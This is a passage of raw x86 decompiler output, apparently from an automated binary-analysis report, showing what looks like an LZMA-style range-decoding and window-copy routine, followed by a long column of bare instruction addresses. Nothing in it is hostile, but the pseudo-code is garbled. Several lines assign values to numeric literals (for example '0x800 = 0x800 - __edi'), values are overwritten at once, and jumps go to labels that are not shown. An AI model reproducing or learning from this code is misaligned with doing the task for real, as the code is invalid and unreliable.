							__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
							__eax =  *(__ebp - 0x58);
							__esi = __edx + __eax;
							 *(__ebp - 0x54) = __esi;
							__ax =  *__esi;
							__edi = __ax & 0x0000ffff;
							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
							__eflags =  *(__ebp - 0xc) - __ecx;
							if( *(__ebp - 0xc) >= __ecx) {
								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
								__cx = __ax;
								__cx = __ax >> 5;
								__eax = __eax - __ecx;
								__edx = __edx + 1;
								__eflags = __edx;
								 *__esi = __ax;
								 *(__ebp - 0x50) = __edx;
							} else {
								 *(__ebp - 0x10) = __ecx;
								0x800 = 0x800 - __edi;
								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
								 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
								 *__esi = __cx;
							}
							__eflags =  *(__ebp - 0x10) - 0x1000000;
							if( *(__ebp - 0x10) >= 0x1000000) {
								goto L148;
							} else {
								goto L146;
							}
						case 0x19:
							__eflags = __ebx - 4;
							if(__ebx < 4) {
								 *(__ebp - 0x2c) = __ebx;
								L119:
								_t393 = __ebp - 0x2c;
								 *_t393 =  *(__ebp - 0x2c) + 1;
								__eflags =  *_t393;
								L120:
								__eax =  *(__ebp - 0x2c);
								__eflags = __eax;
								if(__eax == 0) {
									 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
									goto L170;
								}
								__eflags = __eax -  *(__ebp - 0x60);
								if(__eax >  *(__ebp - 0x60)) {
									goto L171;
								}
								 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
								__eax =  *(__ebp - 0x30);
								_t400 = __ebp - 0x60;
								 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
								__eflags =  *_t400;
								goto L123;
							}
							__ecx = __ebx;
							__eax = __ebx;
							__ecx = __ebx >> 1;
							__eax = __ebx & 0x00000001;
							__ecx = (__ebx >> 1) - 1;
							__al = __al | 0x00000002;
							__eax = (__ebx & 0x00000001) << __cl;
							__eflags = __ebx - 0xe;
							 *(__ebp - 0x2c) = __eax;
							if(__ebx >= 0xe) {
								__ebx = 0;
								 *(__ebp - 0x48) = __ecx;
								L102:
								__eflags =  *(__ebp - 0x48);
								if( *(__ebp - 0x48) <= 0) {
									__eax = __eax + __ebx;
									 *(__ebp - 0x40) = 4;
									 *(__ebp - 0x2c) = __eax;
									__eax =  *(__ebp - 4);
									__eax =  *(__ebp - 4) + 0x644;
									__eflags = __eax;
									L108:
									__ebx = 0;
									 *(__ebp - 0x58) = __eax;
									 *(__ebp - 0x50) = 1;
									 *(__ebp - 0x44) = 0;
									 *(__ebp - 0x48) = 0;
									L112:
									__eax =  *(__ebp - 0x40);
									__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
									if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
										_t391 = __ebp - 0x2c;
										 *_t391 =  *(__ebp - 0x2c) + __ebx;
										__eflags =  *_t391;
										goto L119;
									}
									__eax =  *(__ebp - 0x50);
									 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
									__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
									__eax =  *(__ebp - 0x58);
									__esi = __edi + __eax;
									 *(__ebp - 0x54) = __esi;
									__ax =  *__esi;
									__ecx = __ax & 0x0000ffff;
									__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
									__eflags =  *(__ebp - 0xc) - __edx;
									if( *(__ebp - 0xc) >= __edx) {
										__ecx = 0;
										 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
										__ecx = 1;
										 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
										__ebx = 1;
										__ecx =  *(__ebp - 0x48);
										__ebx = 1 << __cl;
										__ecx = 1 << __cl;
										__ebx =  *(__ebp - 0x44);
										__ebx =  *(__ebp - 0x44) | __ecx;
										__cx = __ax;
										__cx = __ax >> 5;
										__eax = __eax - __ecx;
										__edi = __edi + 1;
										__eflags = __edi;
										 *(__ebp - 0x44) = __ebx;
										 *__esi = __ax;
										 *(__ebp - 0x50) = __edi;
									} else {
										 *(__ebp - 0x10) = __edx;
										0x800 = 0x800 - __ecx;
										0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
										 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
										 *__esi = __dx;
									}
									__eflags =  *(__ebp - 0x10) - 0x1000000;
									if( *(__ebp - 0x10) >= 0x1000000) {
										L111:
										_t368 = __ebp - 0x48;
										 *_t368 =  *(__ebp - 0x48) + 1;
										__eflags =  *_t368;
										goto L112;
									} else {
										goto L109;
									}
								}
								__ecx =  *(__ebp - 0xc);
								__ebx = __ebx + __ebx;
								 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
								__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
								 *(__ebp - 0x44) = __ebx;
								if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
									__ecx =  *(__ebp - 0x10);
									 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
									__ebx = __ebx | 0x00000001;
									__eflags = __ebx;
									 *(__ebp - 0x44) = __ebx;
								}
								__eflags =  *(__ebp - 0x10) - 0x1000000;
								if( *(__ebp - 0x10) >= 0x1000000) {
									L101:
									_t338 = __ebp - 0x48;
									 *_t338 =  *(__ebp - 0x48) - 1;
									__eflags =  *_t338;
									goto L102;
								} else {
									goto L99;
								}
							}
							__edx =  *(__ebp - 4);
							__eax = __eax - __ebx;
							 *(__ebp - 0x40) = __ecx;
							__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
							goto L108;
						case 0x1a:
							goto L55;
						case 0x1b:
							L75:
							__eflags =  *(__ebp - 0x64);
							if( *(__ebp - 0x64) == 0) {
								 *(__ebp - 0x88) = 0x1b;
								goto L170;
							}
							__eax =  *(__ebp - 0x14);
							__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
							__eflags = __eax -  *(__ebp - 0x74);
							if(__eax >=  *(__ebp - 0x74)) {
								__eax = __eax +  *(__ebp - 0x74);
								__eflags = __eax;
							}
							__edx =  *(__ebp - 8);
							__cl =  *(__eax + __edx);
							__eax =  *(__ebp - 0x14);
							 *(__ebp - 0x5c) = __cl;
							 *(__eax + __edx) = __cl;
							__eax = __eax + 1;
							__edx = 0;
							_t274 = __eax %  *(__ebp - 0x74);
							__eax = __eax /  *(__ebp - 0x74);
							__edx = _t274;
							__eax =  *(__ebp - 0x68);
							 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
							 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
							_t283 = __ebp - 0x64;
							 *_t283 =  *(__ebp - 0x64) - 1;
							__eflags =  *_t283;
							 *( *(__ebp - 0x68)) = __cl;
							goto L79;
						case 0x1c:
							while(1) {
								L123:
								__eflags =  *(__ebp - 0x64);
								if( *(__ebp - 0x64) == 0) {
									break;
								}
								__eax =  *(__ebp - 0x14);
								__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
								__eflags = __eax -  *(__ebp - 0x74);
								if(__eax >=  *(__ebp - 0x74)) {
									__eax = __eax +  *(__ebp - 0x74);
									__eflags = __eax;
								}
								__edx =  *(__ebp - 8);
								__cl =  *(__eax + __edx);
								__eax =  *(__ebp - 0x14);
								 *(__ebp - 0x5c) = __cl;
								 *(__eax + __edx) = __cl;
								__eax = __eax + 1;
								__edx = 0;
								_t414 = __eax %  *(__ebp - 0x74);
								__eax = __eax /  *(__ebp - 0x74);
								__edx = _t414;
								__eax =  *(__ebp - 0x68);
								 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
								 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
								 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
								__eflags =  *(__ebp - 0x30);
								 *( *(__ebp - 0x68)) = __cl;
								 *(__ebp - 0x14) = __edx;
								if( *(__ebp - 0x30) > 0) {
									continue;
								} else {
									goto L80;
								}
							}
							 *(__ebp - 0x88) = 0x1c;
							goto L170;
					}
				}
			}













                                                                                            0x00000000
                                                                                            0x00406d5f
                                                                                            0x00406d5f
                                                                                            0x00406d64
                                                                                            0x00406ddb
                                                                                            0x00406de2
                                                                                            0x00406dec
                                                                                            0x004073cb
                                                                                            0x004073cb
                                                                                            0x004073ce
                                                                                            0x004073ce
                                                                                            0x004073d4
                                                                                            0x004073da
                                                                                            0x004073e0
                                                                                            0x004073fa
                                                                                            0x004073fd
                                                                                            0x00407403
                                                                                            0x0040740e
                                                                                            0x00407410
                                                                                            0x004073e2
                                                                                            0x004073e2
                                                                                            0x004073f1
                                                                                            0x004073f5
                                                                                            0x004073f5
                                                                                            0x0040741a
                                                                                            0x00407441
                                                                                            0x00407441
                                                                                            0x00407447
                                                                                            0x00407447
                                                                                            0x00000000
                                                                                            0x0040741c
                                                                                            0x0040741c
                                                                                            0x00407420
                                                                                            0x004075cf
                                                                                            0x00000000
                                                                                            0x004075cf
                                                                                            0x0040742c
                                                                                            0x00407433
                                                                                            0x0040743b
                                                                                            0x0040743e
                                                                                            0x00000000
                                                                                            0x0040743e
                                                                                            0x00406d66
                                                                                            0x00406d66
                                                                                            0x00406d6a
                                                                                            0x00406d72
                                                                                            0x00406d75
                                                                                            0x00406d77
                                                                                            0x00406d7a
                                                                                            0x00406d7c
                                                                                            0x00406d81
                                                                                            0x00406d84
                                                                                            0x00406d8b
                                                                                            0x00406d92
                                                                                            0x00406d95
                                                                                            0x00406da0
                                                                                            0x00406da8
                                                                                            0x00406da8
                                                                                            0x00406da2
                                                                                            0x00406da2
                                                                                            0x00406da2
                                                                                            0x00406d97
                                                                                            0x00406d97
                                                                                            0x00406d97
                                                                                            0x00406daf
                                                                                            0x00406dcd
                                                                                            0x00406dcf
                                                                                            0x00406fa2
                                                                                            0x00406fa2
                                                                                            0x00406fa5
                                                                                            0x00406fa8
                                                                                            0x00406fab
                                                                                            0x00406fae
                                                                                            0x00406fb1
                                                                                            0x00406fb4
                                                                                            0x00406fb7
                                                                                            0x00406fba
                                                                                            0x00406fc0
                                                                                            0x00406fd8
                                                                                            0x00406fdb
                                                                                            0x00406fde
                                                                                            0x00406fe1
                                                                                            0x00406fe1
                                                                                            0x00406fe4
                                                                                            0x00406fea
                                                                                            0x00406fc2
                                                                                            0x00406fc2
                                                                                            0x00406fca
                                                                                            0x00406fcf
                                                                                            0x00406fd1
                                                                                            0x00406fd3
                                                                                            0x00406fd3
                                                                                            0x00406ff4
                                                                                            0x00406ff7
                                                                                            0x00406f9a
                                                                                            0x00406fa0
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00406ff9
                                                                                            0x00406f75
                                                                                            0x00406f79
                                                                                            0x00407581
                                                                                            0x00000000
                                                                                            0x00407581
                                                                                            0x00406f7f
                                                                                            0x00406f82
                                                                                            0x00406f85
                                                                                            0x00406f89
                                                                                            0x00406f8c
                                                                                            0x00406f92
                                                                                            0x00406f94
                                                                                            0x00406f94
                                                                                            0x00406f97
                                                                                            0x00000000
                                                                                            0x00406f97
                                                                                            0x00406db1
                                                                                            0x00406db1
                                                                                            0x00406db4
                                                                                            0x00406dba
                                                                                            0x00406dbc
                                                                                            0x00406dbc
                                                                                            0x00406dbf
                                                                                            0x00406dc2
                                                                                            0x00406dc4
                                                                                            0x00406dc5
                                                                                            0x00406dc8
                                                                                            0x00406e35
                                                                                            0x00406e35
                                                                                            0x00406e39
                                                                                            0x00406e3c
                                                                                            0x00406e3f
                                                                                            0x00406e42
                                                                                            0x00406e45
                                                                                            0x00406e46
                                                                                            0x00406e49
                                                                                            0x00406e4b
                                                                                            0x00406e51
                                                                                            0x00406e54
                                                                                            0x00406e57
                                                                                            0x00406e5a
                                                                                            0x00406e5d
                                                                                            0x00406e63
                                                                                            0x00406e7f
                                                                                            0x00406e82
                                                                                            0x00406e85
                                                                                            0x00406e88
                                                                                            0x00406e8f
                                                                                            0x00406e95
                                                                                            0x00406e99
                                                                                            0x00406e65
                                                                                            0x00406e65
                                                                                            0x00406e69
                                                                                            0x00406e71
                                                                                            0x00406e76
                                                                                            0x00406e78
                                                                                            0x00406e7a
                                                                                            0x00406e7a
                                                                                            0x00406ea3
                                                                                            0x00406ea6
                                                                                            0x00406e1d
                                                                                            0x00406e1d
                                                                                            0x00406e23
                                                                                            0x00406ed6
                                                                                            0x00406edc
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00406ede
                                                                                            0x00406ee1
                                                                                            0x00406ee4
                                                                                            0x00406ee7
                                                                                            0x00406eea
                                                                                            0x00406eed
                                                                                            0x00406ef0
                                                                                            0x00406ef3
                                                                                            0x00406ef6
                                                                                            0x00406efc
                                                                                            0x00406f14
                                                                                            0x00406f17
                                                                                            0x00406f1a
                                                                                            0x00406f1d
                                                                                            0x00406f1d
                                                                                            0x00406f20
                                                                                            0x00406f26
                                                                                            0x00406efe
                                                                                            0x00406efe
                                                                                            0x00406f06
                                                                                            0x00406f0b
                                                                                            0x00406f0d
                                                                                            0x00406f0f
                                                                                            0x00406f0f
                                                                                            0x00406f30
                                                                                            0x00406f33
                                                                                            0x00406eb1
                                                                                            0x00406eb5
                                                                                            0x00407575
                                                                                            0x00000000
                                                                                            0x00407575
                                                                                            0x00406ebb
                                                                                            0x00406ebe
                                                                                            0x00406ec1
                                                                                            0x00406ec5
                                                                                            0x00406ec8
                                                                                            0x00406ece
                                                                                            0x00406ed0
                                                                                            0x00406ed0
                                                                                            0x00406ed3
                                                                                            0x00406ed3
                                                                                            0x00406f33
                                                                                            0x00406f3a
                                                                                            0x00406f3a
                                                                                            0x00406f3a
                                                                                            0x00406f3e
                                                                                            0x00406f3e
                                                                                            0x00406f41
                                                                                            0x00406f44
                                                                                            0x00406f48
                                                                                            0x0040758d
                                                                                            0x00000000
                                                                                            0x0040758d
                                                                                            0x00406f4e
                                                                                            0x00406f51
                                                                                            0x00406f54
                                                                                            0x00406f57
                                                                                            0x00406f5a
                                                                                            0x00406f5d
                                                                                            0x00406f60
                                                                                            0x00406f62
                                                                                            0x00406f65
                                                                                            0x00406f68
                                                                                            0x00406f6b
                                                                                            0x00406f6d
                                                                                            0x00406f6d
                                                                                            0x00406f6d
                                                                                            0x0040710a
                                                                                            0x0040710a
                                                                                            0x0040710d
                                                                                            0x0040710d
                                                                                            0x00000000
                                                                                            0x0040710d
                                                                                            0x00406e2f
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00406eac
                                                                                            0x00406df8
                                                                                            0x00406dfc
                                                                                            0x00407569
                                                                                            0x004075e5
                                                                                            0x004075ed
                                                                                            0x004075f4
                                                                                            0x004075f6
                                                                                            0x004075fd
                                                                                            0x00407601
                                                                                            0x00407601
                                                                                            0x00406e02
                                                                                            0x00406e05
                                                                                            0x00406e08
                                                                                            0x00406e0c
                                                                                            0x00406e0f
                                                                                            0x00406e15
                                                                                            0x00406e17
                                                                                            0x00406e17
                                                                                            0x00406e1a
                                                                                            0x00000000
                                                                                            0x00406e1a
                                                                                            0x00406ea6
                                                                                            0x00406daf
                                                                                            0x00406be3
                                                                                            0x00406be3
                                                                                            0x00406bec
                                                                                            0x004075fa
                                                                                            0x004075fa
                                                                                            0x00000000
                                                                                            0x004075fa
                                                                                            0x00406bf2
                                                                                            0x00000000
                                                                                            0x00406bfd
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00406c06
                                                                                            0x00406c09
                                                                                            0x00406c0c
                                                                                            0x00406c10
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00406c16
                                                                                            0x00406c19
                                                                                            0x00406c1b
                                                                                            0x00406c1c
                                                                                            0x00406c1f
                                                                                            0x00406c21
                                                                                            0x00406c22
                                                                                            0x00406c24
                                                                                            0x00406c27
                                                                                            0x00406c2c
                                                                                            0x00406c31
                                                                                            0x00406c3a
                                                                                            0x00406c4d
                                                                                            0x00406c50
                                                                                            0x00406c5c
                                                                                            0x00406c84
                                                                                            0x00406c86
                                                                                            0x00406c94
                                                                                            0x00406c94
                                                                                            0x00406c98
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00406c88
                                                                                            0x00406c88
                                                                                            0x00406c8b
                                                                                            0x00406c8c
                                                                                            0x00406c8c
                                                                                            0x00000000
                                                                                            0x00406c88
                                                                                            0x00406c62
                                                                                            0x00406c67
                                                                                            0x00406c67
                                                                                            0x00406c70
                                                                                            0x00406c78
                                                                                            0x00406c7b
                                                                                            0x00000000
                                                                                            0x00406c81
                                                                                            0x00406c81
                                                                                            0x00000000
                                                                                            0x00406c81
                                                                                            0x00000000
                                                                                            0x00406c9e
                                                                                            0x00406c9e
                                                                                            0x00406ca2
                                                                                            0x0040754e
                                                                                            0x00000000
                                                                                            0x0040754e
                                                                                            0x00406cab
                                                                                            0x00406cbb
                                                                                            0x00406cbe
                                                                                            0x00406cc1
                                                                                            0x00406cc1
                                                                                            0x00406cc1
                                                                                            0x00406cc4
                                                                                            0x00406cc8
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00406cca
                                                                                            0x00406cd0
                                                                                            0x00406cfa
                                                                                            0x00406d00
                                                                                            0x00406d07
                                                                                            0x00000000
                                                                                            0x00406d07
                                                                                            0x00406cd6
                                                                                            0x00406cd9
                                                                                            0x00406cde
                                                                                            0x00406cde
                                                                                            0x00406ce9
                                                                                            0x00406cf1
                                                                                            0x00406cf4
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00406d39
                                                                                            0x00406d3f
                                                                                            0x00406d42
                                                                                            0x00406d4f
                                                                                            0x00406d57
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00406d0e
                                                                                            0x00406d0e
                                                                                            0x00406d12
                                                                                            0x0040755d
                                                                                            0x00000000
                                                                                            0x0040755d
                                                                                            0x00406d1e
                                                                                            0x00406d29
                                                                                            0x00406d29
                                                                                            0x00406d29
                                                                                            0x00406d2c
                                                                                            0x00406d2f
                                                                                            0x00406d32
                                                                                            0x00406d37
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00406ffe
                                                                                            0x00407002
                                                                                            0x00407020
                                                                                            0x00407023
                                                                                            0x0040702a
                                                                                            0x0040702d
                                                                                            0x00407030
                                                                                            0x00407033
                                                                                            0x00407036
                                                                                            0x00407039
                                                                                            0x0040703b
                                                                                            0x00407042
                                                                                            0x00407043
                                                                                            0x00407045
                                                                                            0x00407048
                                                                                            0x0040704b
                                                                                            0x0040704e
                                                                                            0x0040704e
                                                                                            0x00407053
                                                                                            0x00000000
                                                                                            0x00407053
                                                                                            0x00407004
                                                                                            0x00407007
                                                                                            0x0040700a
                                                                                            0x00407014
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00407068
                                                                                            0x0040706c
                                                                                            0x0040708f
                                                                                            0x00407092
                                                                                            0x00407095
                                                                                            0x0040709f
                                                                                            0x0040706e
                                                                                            0x0040706e
                                                                                            0x00407071
                                                                                            0x00407074
                                                                                            0x00407077
                                                                                            0x00407084
                                                                                            0x00407087
                                                                                            0x00407087
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x004070ab
                                                                                            0x004070af
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x004070b5
                                                                                            0x004070b9
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x004070bf
                                                                                            0x004070c1
                                                                                            0x004070c5
                                                                                            0x004070c5
                                                                                            0x004070c8
                                                                                            0x004070cc
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x0040711c
                                                                                            0x00407120
                                                                                            0x00407127
                                                                                            0x0040712a
                                                                                            0x0040712d
                                                                                            0x00407137
                                                                                            0x00000000
                                                                                            0x00407137
                                                                                            0x00407122
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00407143
                                                                                            0x00407147
                                                                                            0x0040714e
                                                                                            0x00407151
                                                                                            0x00407154
                                                                                            0x00407149
                                                                                            0x00407149
                                                                                            0x00407149
                                                                                            0x00407157
                                                                                            0x0040715a
                                                                                            0x0040715d
                                                                                            0x0040715d
                                                                                            0x00407160
                                                                                            0x00407163
                                                                                            0x00407166
                                                                                            0x00407166
                                                                                            0x00407169
                                                                                            0x00407170
                                                                                            0x00407175
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00407203
                                                                                            0x00407203
                                                                                            0x00407207
                                                                                            0x004075a5
                                                                                            0x00000000
                                                                                            0x004075a5
                                                                                            0x0040720d
                                                                                            0x00407210
                                                                                            0x00407213
                                                                                            0x00407217
                                                                                            0x0040721a
                                                                                            0x00407220
                                                                                            0x00407222
                                                                                            0x00407222
                                                                                            0x00407222
                                                                                            0x00407225
                                                                                            0x00407228
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00407286
                                                                                            0x00407286
                                                                                            0x0040728a
                                                                                            0x004075b1
                                                                                            0x00000000
                                                                                            0x004075b1
                                                                                            0x00407290
                                                                                            0x00407293
                                                                                            0x00407296
                                                                                            0x0040729a
                                                                                            0x0040729d
                                                                                            0x004072a3
                                                                                            0x004072a5
                                                                                            0x004072a5
                                                                                            0x004072a5
                                                                                            0x004072a8
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00407056
                                                                                            0x00407056
                                                                                            0x00407059
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00407395
                                                                                            0x00407399
                                                                                            0x004073bb
                                                                                            0x004073be
                                                                                            0x004073c8
                                                                                            0x00000000
                                                                                            0x004073c8
                                                                                            0x0040739b
                                                                                            0x0040739e
                                                                                            0x004073a2
                                                                                            0x004073a5
                                                                                            0x004073a5
                                                                                            0x004073a8
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00407452
                                                                                            0x00407456
                                                                                            0x00407474
                                                                                            0x00407474
                                                                                            0x00407474
                                                                                            0x0040747b
                                                                                            0x00407482
                                                                                            0x00407489
                                                                                            0x00407489
                                                                                            0x00000000
                                                                                            0x00407489
                                                                                            0x00407458
                                                                                            0x0040745b
                                                                                            0x0040745e
                                                                                            0x00407461
                                                                                            0x00407468
                                                                                            0x004073ac
                                                                                            0x004073ac
                                                                                            0x004073af
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00407543
                                                                                            0x00407546
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x0040717d
                                                                                            0x0040717f
                                                                                            0x00407186
                                                                                            0x00407187
                                                                                            0x00407189
                                                                                            0x0040718c
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00407194
                                                                                            0x00407197
                                                                                            0x0040719a
                                                                                            0x0040719c
                                                                                            0x0040719e
                                                                                            0x0040719e
                                                                                            0x0040719f
                                                                                            0x004071a2
                                                                                            0x004071a9
                                                                                            0x004071ac
                                                                                            0x004071ba
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00407490
                                                                                            0x00407490
                                                                                            0x00407493
                                                                                            0x0040749a
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x0040749f
                                                                                            0x0040749f
                                                                                            0x004074a3
                                                                                            0x004075db
                                                                                            0x00000000
                                                                                            0x004075db
                                                                                            0x004074a9
                                                                                            0x004074ac
                                                                                            0x004074af
                                                                                            0x004074b3
                                                                                            0x004074b6
                                                                                            0x004074bc
                                                                                            0x004074be
                                                                                            0x004074be
                                                                                            0x004074be
                                                                                            0x004074c1
                                                                                            0x004074c4
                                                                                            0x004074c4
                                                                                            0x004074c4
                                                                                            0x004074c4
                                                                                            0x004074c7
                                                                                            0x004074c7
                                                                                            0x004074cb
                                                                                            0x0040752b
                                                                                            0x0040752e
                                                                                            0x00407533
                                                                                            0x00407534
                                                                                            0x00407536
                                                                                            0x00407538
                                                                                            0x0040753b
                                                                                            0x00000000
                                                                                            0x0040753b
                                                                                            0x004074cd
                                                                                            0x004074d3
                                                                                            0x004074d6
                                                                                            0x004074d9
                                                                                            0x004074dc
                                                                                            0x004074df
                                                                                            0x004074e2
                                                                                            0x004074e5
                                                                                            0x004074e8
                                                                                            0x004074eb
                                                                                            0x004074ee
                                                                                            0x00407507
                                                                                            0x0040750a
                                                                                            0x0040750d
                                                                                            0x00407510
                                                                                            0x00407514
                                                                                            0x00407516
                                                                                            0x00407516
                                                                                            0x00407517
                                                                                            0x0040751a
                                                                                            0x004074f0
                                                                                            0x004074f0
                                                                                            0x004074f8
                                                                                            0x004074fd
                                                                                            0x004074ff
                                                                                            0x00407502
                                                                                            0x00407502
                                                                                            0x0040751d
                                                                                            0x00407524
                                                                                            0x00000000
                                                                                            0x00407526
                                                                                            0x00000000
                                                                                            0x00407526
                                                                                            0x00000000
                                                                                            0x004071c2
                                                                                            0x004071c5
                                                                                            0x004071fb
                                                                                            0x0040732b
                                                                                            0x0040732b
                                                                                            0x0040732b
                                                                                            0x0040732b
                                                                                            0x0040732e
                                                                                            0x0040732e
                                                                                            0x00407331
                                                                                            0x00407333
                                                                                            0x004075bd
                                                                                            0x00000000
                                                                                            0x004075bd
                                                                                            0x00407339
                                                                                            0x0040733c
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00407342
                                                                                            0x00407346
                                                                                            0x00407349
                                                                                            0x00407349
                                                                                            0x00407349
                                                                                            0x00000000
                                                                                            0x00407349
                                                                                            0x004071c7
                                                                                            0x004071c9
                                                                                            0x004071cb
                                                                                            0x004071cd
                                                                                            0x004071d0
                                                                                            0x004071d1
                                                                                            0x004071d3
                                                                                            0x004071d5
                                                                                            0x004071d8
                                                                                            0x004071db
                                                                                            0x004071f1
                                                                                            0x004071f6
                                                                                            0x0040722e
                                                                                            0x0040722e
                                                                                            0x00407232
                                                                                            0x0040725e
                                                                                            0x00407260
                                                                                            0x00407267
                                                                                            0x0040726a
                                                                                            0x0040726d
                                                                                            0x0040726d
                                                                                            0x00407272
                                                                                            0x00407272
                                                                                            0x00407274
                                                                                            0x00407277
                                                                                            0x0040727e
                                                                                            0x00407281
                                                                                            0x004072ae
                                                                                            0x004072ae
                                                                                            0x004072b1
                                                                                            0x004072b4
                                                                                            0x00407328
                                                                                            0x00407328
                                                                                            0x00407328
                                                                                            0x00000000
                                                                                            0x00407328
                                                                                            0x004072b6
                                                                                            0x004072bc
                                                                                            0x004072bf
                                                                                            0x004072c2
                                                                                            0x004072c5
                                                                                            0x004072c8
                                                                                            0x004072cb
                                                                                            0x004072ce
                                                                                            0x004072d1
                                                                                            0x004072d4
                                                                                            0x004072d7
                                                                                            0x004072f0
                                                                                            0x004072f2
                                                                                            0x004072f5
                                                                                            0x004072f6
                                                                                            0x004072f9
                                                                                            0x004072fb
                                                                                            0x004072fe
                                                                                            0x00407300
                                                                                            0x00407302
                                                                                            0x00407305
                                                                                            0x00407307
                                                                                            0x0040730a
                                                                                            0x0040730e
                                                                                            0x00407310
                                                                                            0x00407310
                                                                                            0x00407311
                                                                                            0x00407314
                                                                                            0x00407317
                                                                                            0x004072d9
                                                                                            0x004072d9
                                                                                            0x004072e1
                                                                                            0x004072e6
                                                                                            0x004072e8
                                                                                            0x004072eb
                                                                                            0x004072eb
                                                                                            0x0040731a
                                                                                            0x00407321
                                                                                            0x004072ab
                                                                                            0x004072ab
                                                                                            0x004072ab
                                                                                            0x004072ab
                                                                                            0x00000000
                                                                                            0x00407323
                                                                                            0x00000000
                                                                                            0x00407323
                                                                                            0x00407321
                                                                                            0x00407234
                                                                                            0x00407237
                                                                                            0x00407239
                                                                                            0x0040723c
                                                                                            0x0040723f
                                                                                            0x00407242
                                                                                            0x00407244
                                                                                            0x00407247
                                                                                            0x0040724a
                                                                                            0x0040724a
                                                                                            0x0040724d
                                                                                            0x0040724d
                                                                                            0x00407250
                                                                                            0x00407257
                                                                                            0x0040722b
                                                                                            0x0040722b
                                                                                            0x0040722b
                                                                                            0x0040722b
                                                                                            0x00000000
                                                                                            0x00407259
                                                                                            0x00000000
                                                                                            0x00407259
                                                                                            0x00407257
                                                                                            0x004071dd
                                                                                            0x004071e0
                                                                                            0x004071e2
                                                                                            0x004071e5
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x004070cf
                                                                                            0x004070cf
                                                                                            0x004070d3
                                                                                            0x00407599
                                                                                            0x00000000
                                                                                            0x00407599
                                                                                            0x004070d9
                                                                                            0x004070dc
                                                                                            0x004070df
                                                                                            0x004070e2
                                                                                            0x004070e4
                                                                                            0x004070e4
                                                                                            0x004070e4
                                                                                            0x004070e7
                                                                                            0x004070ea
                                                                                            0x004070ed
                                                                                            0x004070f0
                                                                                            0x004070f3
                                                                                            0x004070f6
                                                                                            0x004070f7
                                                                                            0x004070f9
                                                                                            0x004070f9
                                                                                            0x004070f9
                                                                                            0x004070fc
                                                                                            0x004070ff
                                                                                            0x00407102
                                                                                            0x00407105
                                                                                            0x00407105
                                                                                            0x00407105
                                                                                            0x00407108
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x0040734c
                                                                                            0x0040734c
                                                                                            0x0040734c
                                                                                            0x00407350
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00407356
                                                                                            0x00407359
                                                                                            0x0040735c
                                                                                            0x0040735f
